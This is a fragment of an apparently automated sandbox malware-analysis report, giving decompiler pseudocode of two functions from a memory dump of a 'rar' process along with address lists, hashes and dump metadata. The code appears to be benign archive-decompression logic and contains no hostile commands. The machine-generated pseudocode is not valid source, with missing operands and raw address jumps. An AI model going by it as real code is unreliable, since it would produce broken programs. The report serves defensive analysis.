				if (0 + _t209 - _t153 < 0) goto 0x50b4f486;
				if (_t153 == 0) goto 0x50b4f557;
				r12d =  *((intOrPtr*)(_t338 + 0xb8));
				_t366 = _t331 * 2 + _t331 + _t331 * 2 + _t331;
				r8d = 0;
				 *((long long*)(_t338 + 0x28)) =  *((intOrPtr*)(_t349 + 0x18 + (_t262 + _t262 * 2 + _t262 + _t262 * 2) * 8));
				 *((long long*)(_t338 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t329 + 0x78)) + 0x18 + ( *(_t349 + 0x18 + _t356 * 8) +  *(_t349 + 0x18 + _t356 * 8) * 2 +  *(_t349 + 0x18 + _t356 * 8) +  *(_t349 + 0x18 + _t356 * 8) * 2) * 8));
				E00007FF67FF650B56794( *((intOrPtr*)(_t329 + 0x128)), 0, _t272, _t329 + 0x10,  *((intOrPtr*)(_t349 + 0x18 + (_t262 + _t262 * 2 + _t262 + _t262 * 2) * 8)), _t329, _t330,  *((intOrPtr*)( *((intOrPtr*)(_t329 + 0x78)) + 0x18 + _t366 * 8)));
				if (0 + _t209 - r12d < 0) goto 0x50b4f504;
				_t183 =  *((intOrPtr*)(_t329 + 0x128));
				if (0 + _t209 - _t183 < 0) goto 0x50b4f4f4;
				_t359 =  *((intOrPtr*)(_t338 + 0x38));
				if (_t183 == 0) goto 0x50b4f5a1;
				if ( *((char*)( *((intOrPtr*)(_t329 + 0x78)) + (_t331 * 2 + _t331 + _t331 * 2 + _t331) * 8)) != 0) goto 0x50b4f597;
				r8d =  *((intOrPtr*)(_t329 + 0x150));
				E00007FF67FF650B6BAF0();
				if (0 + _t209 -  *((intOrPtr*)(_t329 + 0x128)) < 0) goto 0x50b4f55d;
				r15d = 0;
				if ( *((intOrPtr*)(_t329 + 0x128)) == 0) goto 0x50b4f67b;
				_t266 =  *((intOrPtr*)(_t329 + 0x138));
				_t275 = (_t371 + _t371 * 2 << 4) +  *((intOrPtr*)(_t329 + 0x78));
				r14d = r15d;
				_t368 = _t366 *  *(_t329 + 0x140) +  *(_t338 + 0xc0);
				if (_t368 - _t266 > 0) goto 0x50b4f664;
				_t334 =  >=  ? _t266 - _t368 :  *((intOrPtr*)(_t275 + 0x20));
				if (( >=  ? _t266 - _t368 :  *((intOrPtr*)(_t275 + 0x20))) == 0) goto 0x50b4f65c;
				if ( *_t275 != 0) goto 0x50b4f7a1;
				r8d = 0;
				_t269 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t329 + 8)))) + 0x20));
				 *0x50b80550();
				E00007FF67FF650B329C4(_t183 + _t209,  *((intOrPtr*)(_t329 + 0x128)), 0 + _t209, _t269, _t275,  *((intOrPtr*)(_t329 + 8)),  *((intOrPtr*)(_t275 + 0x18)),  >=  ? _t266 - _t368 :  *((intOrPtr*)(_t275 + 0x20)));
				E00007FF67FF650B28658(_t269, _t275,  *((intOrPtr*)(_t329 + 8)),  *((intOrPtr*)(_t275 + 0x18)), _t329,  *((intOrPtr*)(_t275 + 0x20)));
				_t243 = _t269 -  *((intOrPtr*)(_t275 + 0x28));
				r9b = _t243 == 0;
				if (_t243 != 0) goto 0x50b4f645;
				_t362 = _t361 + _t330;
				goto 0x50b4f64d;
				 *((intOrPtr*)(_t338 + 0xb0)) = sil;
				r8d =  *((intOrPtr*)(_t275 + 0x20));
				E00007FF67FF650B50A50( *((intOrPtr*)(_t329 + 0x128)), _t208, _t243, _t269, _t275, _t368,  >=  ? _t266 - _t368 :  *((intOrPtr*)(_t275 + 0x20)),  *((intOrPtr*)(_t329 + 0x78)), _t356, _t357);
				r15d = r15d + _t209;
				if (r15d -  *((intOrPtr*)(_t329 + 0x128)) < 0) goto 0x50b4f5ba;
				 *((long long*)(_t338 + 0x38)) = _t359;
				r9d = 0;
				if ( *((intOrPtr*)(_t329 + 0x12c)) - r9d <= 0) goto 0x50b4f6bd;
				_t346 = (_t329 + _t269 + (_t329 + _t269) * 2 << 4) +  *((intOrPtr*)(_t329 + 0x78));
				if ( *_t346 == 0) goto 0x50b4f6b1;
				 *((intOrPtr*)(_t346 + 8)) =  *((intOrPtr*)(_t346 + 8)) + _t269;
				r9d = r9d + _t209;
				if (r9d -  *((intOrPtr*)(_t329 + 0x12c)) < 0) goto 0x50b4f687;
				_t185 =  *((intOrPtr*)(_t338 + 0xb0));
				_t336 =  *(_t338 + 0xc0) + _t269;
				 *(_t338 + 0xc0) = _t336;
				if (_t336 -  *(_t329 + 0x140) < 0) goto 0x50b4f396;
				_t369 =  *((intOrPtr*)(_t338 + 0x30));
				if (_t362 != 0) goto 0x50b4f70d;
				if (_t359 != 0) goto 0x50b4f70d;
				if ( *((intOrPtr*)(_t329 + 0x100)) - _t330 <= 0) goto 0x50b4f73e;
				if (_t369 == 0) goto 0x50b4f73e;
				E00007FF67FF650B4EE18(_t185, 0 + _t209, _t275, _t329, _t330, _t336);
				E00007FF67FF650B4EF88(_t185, _t275, _t329, _t329, _t330, _t357);
				_t271 =  *_t329;
				if ( *((char*)(_t271 + 0x7f84)) != 0) goto 0x50b4f73e;
				if ( *((long long*)(_t271 + 0x7f70)) == 0) goto 0x50b4f73e;
				E00007FF67FF650B1C040( *((intOrPtr*)(_t329 + 0x128)), 0, _t271, _t275,  *((intOrPtr*)(_t329 + 8)), _t330, _t336,  *((intOrPtr*)(_t329 + 0x78)), _t357);
				r8d = 0x64;
				E00007FF67FF650B52FB8(_t185, _t275,  *_t329, _t368, _t346);
				r8d = r12d;
				_t167 = E00007FF67FF650B11144(0x6d, r13d);
				0x50b69b94();
				if ( *((char*)(_t329 + 0x154)) == 0) goto 0x50b4f78a;
				E00007FF67FF650B2CC24(_t167, 3,  *((char*)(_t329 + 0x154)), 0x50ba7ab8);
				E00007FF67FF650B164E4(0x6c);
				if (_t185 == 0) goto 0x50b4f7e0;
				if (_t362 != 0) goto 0x50b4f798;
				if (_t359 == 0) goto 0x50b4f79d;
				goto 0x50b4f7e2;
				_t276 =  *((intOrPtr*)(_t275 + 8));
				_t133 = _t338 + 0x40; // 0x798
				 *((long long*)(_t338 + 0x40)) = _t276;
				 *((long long*)(_t338 + 0x48)) = _t369;
				 *(_t338 + 0x50) = _t336;
				E00007FF67FF650B4ED50(_t271, _t276, _t329, _t133);
				if (_t276 != _t369) goto 0x50b4f7d8;
				 *((intOrPtr*)(_t338 + 0x30)) =  *((intOrPtr*)(_t338 + 0x30)) + _t330;
				goto 0x50b4f664;
				goto 0x50b4f664;
				return 0;
			}
















































                                                                                                            0x7ff650b4f2f0
                                                                                                            0x7ff650b4f2f0
                                                                                                            0x7ff650b4f30f
                                                                                                            0x7ff650b4f312
                                                                                                            0x7ff650b4f31f
                                                                                                            0x7ff650b4f32a
                                                                                                            0x7ff650b4f33c
                                                                                                            0x7ff650b4f344
                                                                                                            0x7ff650b4f347
                                                                                                            0x7ff650b4f35b
                                                                                                            0x7ff650b4f362
                                                                                                            0x7ff650b4f365
                                                                                                            0x7ff650b4f368
                                                                                                            0x7ff650b4f36f
                                                                                                            0x7ff650b4f374
                                                                                                            0x7ff650b4f377
                                                                                                            0x7ff650b4f37e
                                                                                                            0x7ff650b4f37e
                                                                                                            0x7ff650b4f381
                                                                                                            0x7ff650b4f390
                                                                                                            0x7ff650b4f396
                                                                                                            0x7ff650b4f3a8
                                                                                                            0x7ff650b4f3b3
                                                                                                            0x7ff650b4f3b8
                                                                                                            0x7ff650b4f3c2
                                                                                                            0x7ff650b4f3c4
                                                                                                            0x7ff650b4f3e0
                                                                                                            0x7ff650b4f3e2
                                                                                                            0x7ff650b4f3ec
                                                                                                            0x7ff650b4f3f1
                                                                                                            0x7ff650b4f3f8
                                                                                                            0x7ff650b4f400
                                                                                                            0x7ff650b4f402
                                                                                                            0x7ff650b4f414
                                                                                                            0x7ff650b4f419
                                                                                                            0x7ff650b4f41c
                                                                                                            0x7ff650b4f42c
                                                                                                            0x7ff650b4f43c
                                                                                                            0x7ff650b4f440
                                                                                                            0x7ff650b4f44a
                                                                                                            0x7ff650b4f458
                                                                                                            0x7ff650b4f465
                                                                                                            0x7ff650b4f46c
                                                                                                            0x7ff650b4f474
                                                                                                            0x7ff650b4f484
                                                                                                            0x7ff650b4f486
                                                                                                            0x7ff650b4f495
                                                                                                            0x7ff650b4f49d
                                                                                                            0x7ff650b4f4a5
                                                                                                            0x7ff650b4f4b5
                                                                                                            0x7ff650b4f4b7
                                                                                                            0x7ff650b4f4d1
                                                                                                            0x7ff650b4f4d8
                                                                                                            0x7ff650b4f4e2
                                                                                                            0x7ff650b4f4ea
                                                                                                            0x7ff650b4f4ec
                                                                                                            0x7ff650b4f501
                                                                                                            0x7ff650b4f50a
                                                                                                            0x7ff650b4f519
                                                                                                            0x7ff650b4f535
                                                                                                            0x7ff650b4f53a
                                                                                                            0x7ff650b4f544
                                                                                                            0x7ff650b4f546
                                                                                                            0x7ff650b4f550
                                                                                                            0x7ff650b4f552
                                                                                                            0x7ff650b4f55b
                                                                                                            0x7ff650b4f574
                                                                                                            0x7ff650b4f576
                                                                                                            0x7ff650b4f590
                                                                                                            0x7ff650b4f59f
                                                                                                            0x7ff650b4f5af
                                                                                                            0x7ff650b4f5b4
                                                                                                            0x7ff650b4f5ba
                                                                                                            0x7ff650b4f5c9
                                                                                                            0x7ff650b4f5cd
                                                                                                            0x7ff650b4f5d8
                                                                                                            0x7ff650b4f5de
                                                                                                            0x7ff650b4f5ee
                                                                                                            0x7ff650b4f5f5
                                                                                                            0x7ff650b4f5fa
                                                                                                            0x7ff650b4f604
                                                                                                            0x7ff650b4f60d
                                                                                                            0x7ff650b4f611
                                                                                                            0x7ff650b4f622
                                                                                                            0x7ff650b4f631
                                                                                                            0x7ff650b4f636
                                                                                                            0x7ff650b4f63a
                                                                                                            0x7ff650b4f63e
                                                                                                            0x7ff650b4f640
                                                                                                            0x7ff650b4f643
                                                                                                            0x7ff650b4f645
                                                                                                            0x7ff650b4f64d
                                                                                                            0x7ff650b4f657
                                                                                                            0x7ff650b4f66a
                                                                                                            0x7ff650b4f670
                                                                                                            0x7ff650b4f676
                                                                                                            0x7ff650b4f67b
                                                                                                            0x7ff650b4f685
                                                                                                            0x7ff650b4f697
                                                                                                            0x7ff650b4f69f
                                                                                                            0x7ff650b4f6a7
                                                                                                            0x7ff650b4f6b1
                                                                                                            0x7ff650b4f6bb
                                                                                                            0x7ff650b4f6c5
                                                                                                            0x7ff650b4f6d5
                                                                                                            0x7ff650b4f6d8
                                                                                                            0x7ff650b4f6e7
                                                                                                            0x7ff650b4f6ed
                                                                                                            0x7ff650b4f6f8
                                                                                                            0x7ff650b4f6fd
                                                                                                            0x7ff650b4f706
                                                                                                            0x7ff650b4f70b
                                                                                                            0x7ff650b4f710
                                                                                                            0x7ff650b4f718
                                                                                                            0x7ff650b4f71d
                                                                                                            0x7ff650b4f727
                                                                                                            0x7ff650b4f731
                                                                                                            0x7ff650b4f739
                                                                                                            0x7ff650b4f746
                                                                                                            0x7ff650b4f749
                                                                                                            0x7ff650b4f74e
                                                                                                            0x7ff650b4f759
                                                                                                            0x7ff650b4f761
                                                                                                            0x7ff650b4f76d
                                                                                                            0x7ff650b4f77b
                                                                                                            0x7ff650b4f785
                                                                                                            0x7ff650b4f78c
                                                                                                            0x7ff650b4f791
                                                                                                            0x7ff650b4f796
                                                                                                            0x7ff650b4f79f
                                                                                                            0x7ff650b4f7a1
                                                                                                            0x7ff650b4f7a5
                                                                                                            0x7ff650b4f7ad
                                                                                                            0x7ff650b4f7b2
                                                                                                            0x7ff650b4f7b7
                                                                                                            0x7ff650b4f7bc
                                                                                                            0x7ff650b4f7cc
                                                                                                            0x7ff650b4f7ce
                                                                                                            0x7ff650b4f7d3
                                                                                                            0x7ff650b4f7db
                                                                                                            0x7ff650b4f7f2

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep_invalid_parameter_noinfo
                                                                                                            • String ID:
                                                                                                            • API String ID: 2406859374-0
                                                                                                            • Opcode ID: 7f91f8715d5aa10f3630fa04e32a18b3c90acec191ed46d961ec857c3aeb9c92
                                                                                                            • Instruction ID: 53e630cd48b459162735670b7e2a7dd44cc4968a1dd9e0c9275de51df4ab248c
                                                                                                            • Opcode Fuzzy Hash: 7f91f8715d5aa10f3630fa04e32a18b3c90acec191ed46d961ec857c3aeb9c92
                                                                                                            • Instruction Fuzzy Hash: ADE1E272B08683B6EB549F25D5817BD67A2FB4A784F084031DB8E977A5DF3AE560C300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B612C8 Relevance: .3, Instructions: 319COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 51%
                                                                                                            			E00007FF67FF650B612C8(long long __rbx, signed long long __rcx, long long __rbp, void* __r9, void* __r11, long long _a16, long long _a24) {
				void* _v40;
				signed int _v56;
				char _v750;
				char _v798;
				char _v1096;
				char _v1128;
				void* _t125;
				intOrPtr _t132;
				void* _t143;
				signed int _t164;
				signed char _t185;
				signed int _t186;
				void* _t187;
				unsigned int _t192;
				signed char _t193;
				signed int _t195;
				intOrPtr _t202;
				signed int _t208;
				void* _t239;
				void* _t241;
				signed long long _t265;
				signed long long _t266;
				signed long long _t268;
				intOrPtr _t271;
				intOrPtr _t273;
				intOrPtr _t284;
				intOrPtr _t285;
				unsigned long long _t286;
				signed long long _t287;
				void* _t294;
				void* _t297;
				signed long long _t298;
				void* _t300;
				void* _t301;
				void* _t310;
				signed int* _t311;
				intOrPtr _t313;
				intOrPtr _t316;
				void* _t318;
				void* _t320;

				_t310 = __r9;
				_a16 = __rbx;
				_a24 = __rbp;
				_t298 = _t297 - 0x460;
				_t265 =  *0x50b978f0; // 0x27db226282f1
				_t266 = _t265 ^ _t298;
				_v56 = _t266;
				_t125 =  *((intOrPtr*)(__rcx + 0xe8)) - 0x19;
				_t268 = __rcx;
				if ( *((intOrPtr*)(__rcx + 8)) - _t125 <= 0) goto 0x50b61313;
				0x50b62db8();
				_t239 = _t125;
				if (_t239 == 0) goto 0x50b616e2;
				_t271 =  *((intOrPtr*)(__rcx + 0x18));
				r14d = 8;
				_t284 =  *((intOrPtr*)(__rcx + 8));
				r8d =  *(_t284 + _t271 + 1) & 0x000000ff;
				r8d = r8d | ( *(_t284 + _t271) & 0x000000ff) << 0x00000008;
				r8d = r8d << 8;
				r8d = r8d |  *(_t284 + _t271 + 2) & 0x000000ff;
				r8d = r8d >> r14d -  *(__rcx + 0xc);
				 *((char*)(__rcx + 0x98c0)) = (r8w & 0xffffffff) >> 0xf;
				asm("bt esi, 0xe");
				if (_t239 < 0) goto 0x50b6136f;
				r8d = 0x404;
				E00007FF67FF650B6C1A0((r8w & 0xffffffff) >> 0xf, 0, __rcx + 0x94bc, _t284, _t300);
				r9d =  *(__rcx + 0xc);
				r9d = r9d + 2;
				r9d = r9d & 0x00000007;
				_t202 = (r9d >> 3) +  *((intOrPtr*)(__rcx + 8));
				 *((intOrPtr*)(__rcx + 8)) = _t202;
				 *(__rcx + 0xc) = r9d;
				if ( *((intOrPtr*)(__rcx + 0x98c0)) == dil) goto 0x50b613d4;
				_t21 = _t294 + 1; // 0x9
				_t132 = _t21;
				 *((intOrPtr*)(__rcx + 0x98c4)) = _t132;
				_t241 =  *((intOrPtr*)(__rcx + 0x98c8)) - _t132;
				if (_t241 < 0) goto 0x50b613b1;
				 *((intOrPtr*)(__rcx + 0x98c8)) = 0;
				r9d = r9d + 2;
				r9d = r9d & 0x00000007;
				 *(__rcx + 0xc) = r9d;
				 *((intOrPtr*)(__rcx + 8)) = (r9d >> 3) + _t202;
				goto 0x50b613d9;
				_t311 =  &_v1128;
				r11d = 0x13;
				_t273 =  *((intOrPtr*)(__rcx + 0x18));
				_t285 =  *((intOrPtr*)(__rcx + 8));
				r8d =  *(_t285 + _t273 + 1) & 0x000000ff;
				r8d = r8d | ( *(_t285 + _t273) & 0x000000ff) << 0x00000008;
				r8d = r8d << 8;
				r8d = r8d |  *(_t285 + _t273 + 2) & 0x000000ff;
				r8d = r8d >> r14d - r9d;
				r9d = r9d + 4;
				r8d = r8d >> 0xc;
				r8b = r8b & 0x0000000f;
				 *((intOrPtr*)(__rcx + 8)) =  *((intOrPtr*)(__rcx + 8)) + (r9d >> 3);
				r9d = r9d & 0x00000007;
				 *_t311 = r8b;
				 *(__rcx + 0xc) = r9d;
				if (_t241 != 0) goto 0x50b613e6;
				_t320 = __rcx + 0x3cb4;
				r9d = 0x13;
				_t301 = _t320;
				_t286 =  &_v1128;
				E00007FF67FF650B605A8(__rcx, _t286, _t301);
				if (0x176 == 0) goto 0x50b6167c;
				_t143 =  *((intOrPtr*)(_t268 + 0xe8)) - 5;
				if ( *((intOrPtr*)(_t268 + 8)) - _t143 <= 0) goto 0x50b6147e;
				0x50b62db8();
				if (_t143 == 0) goto 0x50b616e2;
				_t316 =  *((intOrPtr*)(_t268 + 0x18));
				r12d =  *(_t268 + 0xc);
				_t208 = (( *( *((intOrPtr*)(_t268 + 8)) + _t316 + 1) & 0x000000ff | ( *( *((intOrPtr*)(_t268 + 8)) + _t316) & 0x000000ff) << 0x00000008) << 0x00000008 |  *( *((intOrPtr*)(_t268 + 8)) + _t316 + 2) & 0x000000ff) >> 0x00000008 - r12d & 0x0000fffe;
				if (_t208 -  *((intOrPtr*)(_t320 + 4 + _t268 * 4)) >= 0) goto 0x50b614fb;
				_t185 = 0x10 -  *((intOrPtr*)(_t320 + 0x84));
				_t287 = _t286 >> _t185;
				r9d =  *(_t287 + _t320 + 0x88) & 0x000000ff;
				r9d = r9d + r12d;
				r14d = r14d + (r9d >> 3);
				r9d = r9d & 0x00000007;
				 *((intOrPtr*)(_t268 + 8)) = r14d;
				 *(_t268 + 0xc) = r9d;
				r8d =  *(_t320 + 0x488 + _t287 * 2) & 0x0000ffff;
				goto 0x50b6156b;
				r10d = 0xf;
				_t186 = _t185 + 1;
				if (_t186 - r10d >= 0) goto 0x50b61527;
				r8d = _t186;
				if (_t208 -  *((intOrPtr*)(_t320 + (_t301 + 1) * 4)) < 0) goto 0x50b61524;
				_t187 = _t186 + 1;
				if (_t187 - r10d < 0) goto 0x50b61512;
				goto 0x50b61527;
				r10d = _t187;
				r9d = _t318 +  &(_t311[0]);
				r9d = r9d & 0x00000007;
				r14d = r14d + (r9d >> 3);
				 *(_t268 + 0xc) = r9d;
				 *((intOrPtr*)(_t268 + 8)) = r14d;
				asm("sbb eax, eax");
				r8d =  *(_t320 + 0xc88 + _t266 * 2) & 0x0000ffff;
				if (r8w - 0x10 >= 0) goto 0x50b61590;
				r8b = r8b +  *((intOrPtr*)(_t266 + _t268 + 0x94bc));
				r8b = r8b & 0x0000000f;
				 *(_t298 + _t266 + 0x40) = r8b;
				goto 0x50b61674;
				_t313 = r14d;
				if (r8w != 0x10) goto 0x50b6160c;
				r8d =  *(_t313 + _t316 + 1) & 0x000000ff;
				r8d = r8d | ( *(_t313 + _t316) & 0x000000ff) << 0x00000008;
				r8d = r8d << 8;
				r8d = r8d |  *(_t313 + _t316 + 2) & 0x000000ff;
				r8d = r8d >> 8 - r9d;
				_t86 = _t310 + 2; // 0x15
				_t192 = _t86;
				r8d = r8d >> 0xe;
				r8d = r8d & 0x00000003;
				_t193 = _t192 & 0x00000007;
				r8d = r8d + 3;
				 *((intOrPtr*)(_t268 + 8)) = (_t192 >> 3) + r14d;
				 *(_t268 + 0xc) = _t193;
				if (1 == 0) goto 0x50b616e2;
				r8d = r8d - 1;
				if (1 - 0x176 >= 0) goto 0x50b6167c;
				_t164 =  *(_t298 + _t266 + 0x40);
				 *(_t298 + _t287 + 0x40) = _t164;
				if (r8d != 0) goto 0x50b615eb;
				goto 0x50b61674;
				if (r8w != 0x11) goto 0x50b61637;
				goto 0x50b61644;
				_t99 = _t310 + 7; // 0x1a
				_t195 = _t99;
				 *((intOrPtr*)(_t268 + 8)) = (_t195 >> 3) + r14d;
				 *(_t268 + 0xc) = _t195 & 0x00000007;
				if (2 - 0x176 >= 0) goto 0x50b6167c;
				if (_t266 - 0x404 >= 0) goto 0x50b6177c;
				 *(_t298 + _t266 + 0x40) = dil;
				if ((((( *(_t313 + _t316 + 1) & 0x000000ff | _t164) << 0x00000008 |  *(_t313 + _t316 + 2) & 0x000000ff) >> _t193 >> 0x0000000d & 0x00000007) + 0x00000003 >> 0x00000009 & 0x0000007f) + 0xb - 1 != 0) goto 0x50b61655;
				if (3 - 0x176 < 0) goto 0x50b61460;
				 *((char*)(_t268 + 0xe8ac)) = 1;
				if ( *((intOrPtr*)(_t268 + 8)) -  *((intOrPtr*)(_t268 + 0xe8)) > 0) goto 0x50b6174e;
				if ( *((intOrPtr*)(_t268 + 0x98c0)) == dil) goto 0x50b616e6;
				if ( *((intOrPtr*)(_t268 + 0x98c4)) <= 0) goto 0x50b6173a;
				r9d = 0x101;
				E00007FF67FF650B605A8(_t268,  &_v1096 + _t266 * 0xeec, _t268 + 0x590c + _t266 * 0xeec);
				if (1 -  *((intOrPtr*)(_t268 + 0x98c4)) < 0) goto 0x50b616a7;
				goto 0x50b6173a;
				goto 0x50b61750;
				r9d = 0x12a;
				E00007FF67FF650B605A8(_t268,  &_v1096, _t268 + 0x104);
				r9d = 0x30;
				E00007FF67FF650B605A8(_t268,  &_v798, _t268 + 0xff0);
				r9d = 0x1c;
				E00007FF67FF650B605A8(_t268,  &_v750, _t268 + 0x2dc8);
				r8d = 0x176;
				E00007FF67FF650B6BAF0();
				return E00007FF67FF650B69D10(1, 0, _v56 ^ _t298);
			}











































                                                                                                            0x7ff650b612c8
                                                                                                            0x7ff650b612c8
                                                                                                            0x7ff650b612cd
                                                                                                            0x7ff650b612da
                                                                                                            0x7ff650b612e1
                                                                                                            0x7ff650b612e8
                                                                                                            0x7ff650b612eb
                                                                                                            0x7ff650b612fb
                                                                                                            0x7ff650b612fe
                                                                                                            0x7ff650b61304
                                                                                                            0x7ff650b61306
                                                                                                            0x7ff650b6130b
                                                                                                            0x7ff650b6130d
                                                                                                            0x7ff650b61313
                                                                                                            0x7ff650b61317
                                                                                                            0x7ff650b6131d
                                                                                                            0x7ff650b61325
                                                                                                            0x7ff650b6132e
                                                                                                            0x7ff650b61336
                                                                                                            0x7ff650b61340
                                                                                                            0x7ff650b61343
                                                                                                            0x7ff650b6134f
                                                                                                            0x7ff650b61355
                                                                                                            0x7ff650b61359
                                                                                                            0x7ff650b61364
                                                                                                            0x7ff650b6136a
                                                                                                            0x7ff650b6136f
                                                                                                            0x7ff650b61373
                                                                                                            0x7ff650b6137a
                                                                                                            0x7ff650b61381
                                                                                                            0x7ff650b61384
                                                                                                            0x7ff650b61387
                                                                                                            0x7ff650b61392
                                                                                                            0x7ff650b6139a
                                                                                                            0x7ff650b6139a
                                                                                                            0x7ff650b6139d
                                                                                                            0x7ff650b613a3
                                                                                                            0x7ff650b613a9
                                                                                                            0x7ff650b613ab
                                                                                                            0x7ff650b613b1
                                                                                                            0x7ff650b613b8
                                                                                                            0x7ff650b613c1
                                                                                                            0x7ff650b613c5
                                                                                                            0x7ff650b613d2
                                                                                                            0x7ff650b613de
                                                                                                            0x7ff650b613e3
                                                                                                            0x7ff650b613e6
                                                                                                            0x7ff650b613ea
                                                                                                            0x7ff650b613f2
                                                                                                            0x7ff650b613fb
                                                                                                            0x7ff650b61403
                                                                                                            0x7ff650b6140a
                                                                                                            0x7ff650b61410
                                                                                                            0x7ff650b61413
                                                                                                            0x7ff650b61417
                                                                                                            0x7ff650b6141e
                                                                                                            0x7ff650b61425
                                                                                                            0x7ff650b61428
                                                                                                            0x7ff650b6142c
                                                                                                            0x7ff650b61432
                                                                                                            0x7ff650b6143a
                                                                                                            0x7ff650b6143c
                                                                                                            0x7ff650b61443
                                                                                                            0x7ff650b61446
                                                                                                            0x7ff650b61449
                                                                                                            0x7ff650b61451
                                                                                                            0x7ff650b6145a
                                                                                                            0x7ff650b61466
                                                                                                            0x7ff650b6146c
                                                                                                            0x7ff650b61471
                                                                                                            0x7ff650b61478
                                                                                                            0x7ff650b61487
                                                                                                            0x7ff650b6148b
                                                                                                            0x7ff650b614b6
                                                                                                            0x7ff650b614c1
                                                                                                            0x7ff650b614ca
                                                                                                            0x7ff650b614cc
                                                                                                            0x7ff650b614cf
                                                                                                            0x7ff650b614d8
                                                                                                            0x7ff650b614e1
                                                                                                            0x7ff650b614e4
                                                                                                            0x7ff650b614e8
                                                                                                            0x7ff650b614ec
                                                                                                            0x7ff650b614f0
                                                                                                            0x7ff650b614f9
                                                                                                            0x7ff650b614fb
                                                                                                            0x7ff650b61501
                                                                                                            0x7ff650b61506
                                                                                                            0x7ff650b61508
                                                                                                            0x7ff650b61515
                                                                                                            0x7ff650b61517
                                                                                                            0x7ff650b61520
                                                                                                            0x7ff650b61522
                                                                                                            0x7ff650b61524
                                                                                                            0x7ff650b61527
                                                                                                            0x7ff650b61539
                                                                                                            0x7ff650b6153d
                                                                                                            0x7ff650b61540
                                                                                                            0x7ff650b61544
                                                                                                            0x7ff650b6155e
                                                                                                            0x7ff650b61562
                                                                                                            0x7ff650b61574
                                                                                                            0x7ff650b61578
                                                                                                            0x7ff650b61580
                                                                                                            0x7ff650b61584
                                                                                                            0x7ff650b6158b
                                                                                                            0x7ff650b61590
                                                                                                            0x7ff650b615a7
                                                                                                            0x7ff650b615a9
                                                                                                            0x7ff650b615af
                                                                                                            0x7ff650b615b8
                                                                                                            0x7ff650b615bc
                                                                                                            0x7ff650b615bf
                                                                                                            0x7ff650b615c2
                                                                                                            0x7ff650b615c2
                                                                                                            0x7ff650b615c6
                                                                                                            0x7ff650b615cf
                                                                                                            0x7ff650b615d6
                                                                                                            0x7ff650b615d9
                                                                                                            0x7ff650b615dd
                                                                                                            0x7ff650b615e0
                                                                                                            0x7ff650b615e5
                                                                                                            0x7ff650b615eb
                                                                                                            0x7ff650b615f0
                                                                                                            0x7ff650b615fb
                                                                                                            0x7ff650b61601
                                                                                                            0x7ff650b61608
                                                                                                            0x7ff650b6160a
                                                                                                            0x7ff650b61626
                                                                                                            0x7ff650b61635
                                                                                                            0x7ff650b6163a
                                                                                                            0x7ff650b6163a
                                                                                                            0x7ff650b6164f
                                                                                                            0x7ff650b61652
                                                                                                            0x7ff650b61659
                                                                                                            0x7ff650b61665
                                                                                                            0x7ff650b6166b
                                                                                                            0x7ff650b61672
                                                                                                            0x7ff650b61676
                                                                                                            0x7ff650b61682
                                                                                                            0x7ff650b6168c
                                                                                                            0x7ff650b61699
                                                                                                            0x7ff650b616a1
                                                                                                            0x7ff650b616bc
                                                                                                            0x7ff650b616d1
                                                                                                            0x7ff650b616de
                                                                                                            0x7ff650b616e0
                                                                                                            0x7ff650b616e4
                                                                                                            0x7ff650b616ed
                                                                                                            0x7ff650b616fb
                                                                                                            0x7ff650b61707
                                                                                                            0x7ff650b61718
                                                                                                            0x7ff650b61724
                                                                                                            0x7ff650b61735
                                                                                                            0x7ff650b6173a
                                                                                                            0x7ff650b61749
                                                                                                            0x7ff650b6177b

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
